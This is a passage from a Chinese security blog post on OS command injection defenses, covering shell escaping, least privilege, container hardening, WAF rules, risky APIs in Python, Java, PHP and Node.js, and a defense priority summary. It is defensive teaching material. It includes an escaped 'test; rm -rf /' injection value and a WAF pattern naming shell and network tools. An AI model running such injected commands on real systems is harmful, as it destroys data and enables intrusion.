# 实际执行：echo &#39;test; rm -rf /&#39;
# 输出：test; rm -rf /（纯文本，不会执行 rm）
</code></pre>
<pre><code class="java">// Java: 没有内置的 Shell 转义函数
// 推荐做法：不使用 Shell，用 ProcessBuilder 参数数组
// 如果必须用 Shell，手动用单引号包裹并转义内部单引号
String safeInput = &quot;&#39;&quot; + userInput.replace(&quot;&#39;&quot;, &quot;&#39;\\&#39;&#39;&quot;) + &quot;&#39;&quot;;
</code></pre>
<p><strong>转义的局限性：</strong> Shell 转义容易出错——不同 Shell 的转义规则不同，嵌套引号的处理很复杂，编码问题（Unicode、空字节）可能导致转义失效。所以转义是最后的手段，优先使用参数化调用（4.2）。</p>
<h4 id="4-5-最小权限原则"><a href="#4-5-最小权限原则" class="headerlink" title="4.5 最小权限原则"></a>4.5 最小权限原则</h4><p>即使命令注入发生，限制 Web 应用的运行权限可以减小影响范围：</p>
<p><strong>不以 root 运行 Web 应用。</strong> 创建专用用户，只赋予必要的文件读写权限：</p>
<pre><code class="bash"># 创建专用用户
useradd -r -s /bin/false wwwapp
# 设置文件权限
chown -R wwwapp:wwwapp /var/www/app
chmod 750 /var/www/app
# Web 应用以 wwwapp 用户运行
sudo -u wwwapp python3 app.py
</code></pre>
<p><strong>使用容器隔离。</strong> 将 Web 应用运行在 Docker 容器中，容器内的命令执行被限制在容器的文件系统和网络范围内：</p>
<pre><code class="dockerfile">FROM python:3.11-slim
# 不使用 root 运行
RUN useradd -r appuser
USER appuser
COPY . /app
WORKDIR /app
CMD [&quot;python3&quot;, &quot;app.py&quot;]
</code></pre>
<pre><code class="yaml"># docker-compose.yml
services:
  web:
    build: .
    read_only: true           # 文件系统只读
    security_opt:
      - no-new-privileges:true # 禁止提权
    cap_drop:
      - ALL                   # 删除所有 Linux capabilities
    networks:
      - frontend              # 只暴露前端网络，不直接访问内网
</code></pre>
<p><strong>限制可用的系统命令。</strong> 如果应用只需要执行 <code>ping</code>，通过 <code>seccomp</code> 或 <code>AppArmor</code> 限制只能执行 <code>ping</code>，禁止 <code>bash</code>、<code>curl</code>、<code>wget</code> 等危险命令。</p>
<h4 id="4-6-WAF-和运行时检测"><a href="#4-6-WAF-和运行时检测" class="headerlink" title="4.6 WAF 和运行时检测"></a>4.6 WAF 和运行时检测</h4><p>Web 应用防火墙（WAF）可以检测常见的命令注入 payload：</p>
<pre><code># WAF 规则示例（伪代码）
if request.param matches /;\s*(id|whoami|cat|ls|rm|wget|curl|bash|nc|python|perl)/
    block request

if request.param matches /\$\(|`|&amp;&amp;|\|\||\|/
    flag as suspicious
</code></pre>
<p><strong>WAF 的局限性：</strong> WAF 基于模式匹配，可以被编码绕过（URL 编码、Unicode 编码、Base64）、换行符绕过（<code>%0a</code>）、通配符绕过（<code>/bin/ca?</code> 匹配 <code>/bin/cat</code>）。WAF 是辅助手段，不能替代代码层面的防御。</p>
<hr>
<h3 id="五、各语言-框架的命令执行风险点"><a href="#五、各语言-框架的命令执行风险点" class="headerlink" title="五、各语言/框架的命令执行风险点"></a>五、各语言/框架的命令执行风险点</h3><h4 id="5-1-Python"><a href="#5-1-Python" class="headerlink" title="5.1 Python"></a>5.1 Python</h4><pre><code class="python"># 危险等级从高到低：
os.system(user_input)              # 通过 Shell 执行，最危险
os.popen(user_input)               # 通过 Shell 执行
subprocess.call(cmd, shell=True)   # 通过 Shell 执行
subprocess.run(cmd, shell=True)    # 通过 Shell 执行

# 安全：
subprocess.run([&#39;cmd&#39;, arg1, arg2])  # 不通过 Shell，参数数组
</code></pre>
<p><code>eval()</code> 和 <code>exec()</code> 虽然不是系统命令执行，但如果用户输入被传入，可以执行任意 Python 代码，危害等同于命令注入。</p>
<h4 id="5-2-Java"><a href="#5-2-Java" class="headerlink" title="5.2 Java"></a>5.2 Java</h4><pre><code class="java">// 危险：通过 Shell 执行
Runtime.getRuntime().exec(new String[]&#123;&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;ping &quot; + userInput&#125;);

// 安全：直接执行，不通过 Shell
Runtime.getRuntime().exec(new String[]&#123;&quot;ping&quot;, &quot;-c&quot;, &quot;4&quot;, hostname&#125;);

// 安全：ProcessBuilder
new ProcessBuilder(&quot;ping&quot;, &quot;-c&quot;, &quot;4&quot;, hostname).start();
</code></pre>
<p>Java 的 <code>Runtime.exec(String)</code> 在内部会将字符串按空格分割为参数数组，但分割逻辑与 Shell 不同，可能在特殊字符上产生意外行为。推荐使用 <code>exec(String[])</code> 或 <code>ProcessBuilder</code>。</p>
<h4 id="5-3-PHP"><a href="#5-3-PHP" class="headerlink" title="5.3 PHP"></a>5.3 PHP</h4><pre><code class="php">// 危险：
system($userInput);
exec($userInput);
passthru($userInput);
shell_exec($userInput);
`$userInput`;  // 反引号等同于 shell_exec

// 转义（如果必须拼入命令）：
$safe = escapeshellarg($userInput);   // 转义参数
$safe = escapeshellcmd($userInput);   // 转义整个命令（不推荐，有已知绕过）
</code></pre>
<p><code>escapeshellcmd()</code> 有已知问题：它不处理参数中的特殊字符（如空格），可能导致参数被拆分。推荐用 <code>escapeshellarg()</code> 转义每个参数，或改用 PHP 原生函数。</p>
<h4 id="5-4-Node-js"><a href="#5-4-Node-js" class="headerlink" title="5.4 Node.js"></a>5.4 Node.js</h4><pre><code class="javascript">// 危险：通过 Shell 执行
const &#123; exec &#125; = require(&#39;child_process&#39;);
exec(`ping -c 4 $&#123;userInput&#125;`);

// 危险：spawn 但通过 Shell
const &#123; spawn &#125; = require(&#39;child_process&#39;);
spawn(&#39;ping&#39;, [&#39;-c&#39;, &#39;4&#39;, userInput], &#123; shell: true &#125;);

// 安全：spawn 不通过 Shell
const &#123; spawn &#125; = require(&#39;child_process&#39;);
spawn(&#39;ping&#39;, [&#39;-c&#39;, &#39;4&#39;, userInput]);  // shell: false（默认值）
</code></pre>
<hr>
<h3 id="六、命令注入与其他注入的对比"><a href="#六、命令注入与其他注入的对比" class="headerlink" title="六、命令注入与其他注入的对比"></a>六、命令注入与其他注入的对比</h3><p>命令注入、SQL 注入、XSS 三者共享同一个根源——数据与指令边界混淆，但执行环境和影响范围不同：</p>
<pre><code>              SQL 注入              XSS                    命令注入
执行环境      数据库引擎            浏览器 JS 引擎          操作系统 Shell
用户输入被当作  SQL 语句            JavaScript 代码         系统命令
影响范围      数据库数据            用户浏览器会话           整个操作系统
危害程度      数据泄露/篡改         会话劫持/钓鱼           远程代码执行
防御核心      参数化查询            输出编码                 避免调用系统命令
</code></pre>
<p>命令注入之所以危害最大，是因为操作系统 Shell 的权限最高——它可以读写文件系统、发起网络请求、创建进程、修改系统配置。一旦攻击者通过命令注入获得 Shell 访问，整个服务器都在其控制之下。</p>
<p><strong>命令注入与文件上传的关联：</strong> 文件上传中，文件名被传入系统命令时会触发命令注入（你在文件上传那篇中看到的文件名注入场景）。防御方式相同——对文件名做白名单验证，不信任用户输入。</p>
<p><strong>命令注入与 SSRF 的关联：</strong> 某些命令注入可以通过 <code>curl</code> 或 <code>wget</code> 实现 SSRF 的效果（让服务端请求内网地址）。反过来，SSRF 如果支持 <code>gopher://</code> 协议，也可以向内网的 Redis/Memcached 发送命令实现类似命令注入的效果。</p>
<hr>
<h3 id="七、防御优先级总结"><a href="#七、防御优先级总结" class="headerlink" title="七、防御优先级总结"></a>七、防御优先级总结</h3><p>按重要程度排列：</p>
<ol>
<li><strong>避免调用系统命令</strong>——用编程语言原生 API 替代，从根本上消除攻击面</li>
<li><strong>参数化调用</strong>——无法避免时使用参数数组（<code>subprocess.run(list)</code>），不经过 Shell</li>
<li><strong>输入白名单验证</strong>——只允许已知安全的字符（字母数字），拒绝一切特殊字符</li>
<li><strong>Shell 转义</strong>——<code>shlex.quote()</code> 用单引号包裹用户输入，作为最后手段</li>
<li><strong>最小权限运行</strong>——不以 root 运行 Web 应用，使用容器隔离</li>
<li><strong>WAF 辅助检测</strong>——检测常见 payload，但不能替代代码层面防御</li>
</ol>
<hr>
<h3 id="八、小结"><a href="#八、小结" class="headerlink" title="八、小结"></a>八、小结</h3><p>命令注入的本质是用户输入被操作系统 Shell 当作命令执行，与 SQL 注入、XSS 共享同一个根源——数据与指令的边界混淆。但命令注入的危害最大，因为它直接影响操作系统，攻击者可以执行任意系统命令、读写文件、发起网络请求、获取服务器完全控制权。</p>
<p>按利用方式分三种：直接注入有回显，可以立即读取数据和获取 Shell；盲注入无回显，通过时间延迟确认漏洞、通过 DNS/HTTP 外带窃取数据、通过写入文件持久化；间接注入通过文件名、环境变量等非显式输入通道触发。</p>
<p>防御的核心思路是消除 Shell 参与。最安全的做法是不调用系统命令，用编程语言原生 API 替代。无法避免时使用参数数组调用（不经过 Shell），配合输入白名单验证。最小权限运行和容器隔离作为兜底，减小被利用后的影响范围。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">小竹</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://zhuyanzhen-lab.github.io/2026/08/08/2026-08-08-command-injection-principles-and-defense/">https://zhuyanzhen-lab.github.io/2026/08/08/2026-08-08-command-injection-principles-and-defense/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">小竹</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">安全</span>
                                </a>
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                                <a href="/tags/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/">
                                    <span class="chip bg-color">命令注入</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2026/08/08/2026-08-08-command-injection-principles-and-defense/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/25.jpg" class="responsive-img" alt="命令注入（OS Command Injection）：原理、攻击与防御">
                        
                        <span class="card-title">命令注入（OS Command Injection）：原理、攻击与防御</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                    <a href="/tags/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">命令注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/08/08/2026-08-08-ssrf-attacks-principles-and-defense/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/27.jpg" class="responsive-img" alt="SSRF 服务端请求伪造：原理、攻击与防御">
                        
                        <span class="card-title">SSRF 服务端请求伪造：原理、攻击与防御</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                    <a href="/tags/SSRF/">
                        <span class="chip bg-color">SSRF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2026</span>
            
            <a href="/about" target="_blank">小竹</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/zhuyanzhen-lab" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
